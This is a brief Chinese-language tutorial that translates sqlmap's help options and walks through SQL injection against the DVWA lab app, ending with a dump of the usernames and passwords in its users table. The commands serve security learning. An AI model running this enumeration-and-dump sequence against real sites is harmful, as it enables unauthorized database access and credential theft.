登录kali,查看sqlmap帮助 sqlmap -h
-u URL, --url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”)
-g GOOGLEDORK Process Google dork results as target URLs 处理谷歌dork结果作为目标URL
–cookie=COOKIE HTTP Cookie header value (e.g. “PHPSESSID=a8d127e…”) HTTP Cookie头值。“PHPSESSID = a8d127e…”)
–proxy=PROXY Use a proxy to connect to the target URL 使用代理连接到目标URL
–level=LEVEL Level of tests to perform (1-5, default 1)要执行的测试级别(1-5,默认为1)
–risk=RISK Risk of tests to perform (1-3, default 1) 执行测试的风险等级(1-3,默认1)
–current-user Retrieve DBMS current user 返回当前用户
–current-db Retrieve DBMS current database 检索DBMS当前数据库
–dbs Enumerate DBMS databases 列举DBMS数据库
–tables Enumerate DBMS database tables 枚举DBMS数据库表
–columns Enumerate DBMS database table columns 枚举DBMS数据库表列
–dump Dump DBMS database table entries 转储DBMS数据库的表条目
–dump-all Dump all DBMS databases tables entries 转储所有DBMS数据库的表条目
-C COL DBMS database table column(s) to enumerate 要枚举的DBMS数据库表列
-D DB DBMS database to enumerate 指定数据库
-T TBL DBMS database table(s) to enumerate 指定表
-p TESTPARAMETER Testable parameter(s) 指定测试的参数
–batch 自动处理
–random-agent 随机代理浏览器
–dbms= 指定注入探测的数据库类型
–os-cmd= 执行操作系统命令
sqmmap -u "url" -p 指定的测试参数 --cookie="浏览器安装cookie插件查看cookie" --batch 自动处理
拿到相关信息
url后面添加--dbs
–dbs Enumerate DBMS databases 列举DBMS数据库
url后面添加-D dvwa --tables
-D DB DBMS database to enumerate 指定数据库
–tables Enumerate DBMS database tables 枚举DBMS数据库表
url后面添加 -D dvwa -T users --columns
-D DB DBMS database to enumerate 指定数据库
-T TBL DBMS database table(s) to enumerate 指定表
–columns Enumerate DBMS database table columns 枚举DBMS数据库表列
url后面添加 -D dvwa -T users -C "user,password" --dump
-C COL DBMS database table column(s) to enumerate 要枚举的DBMS数据库表列
–dump Dump DBMS database table entries 转储DBMS数据库的表条目
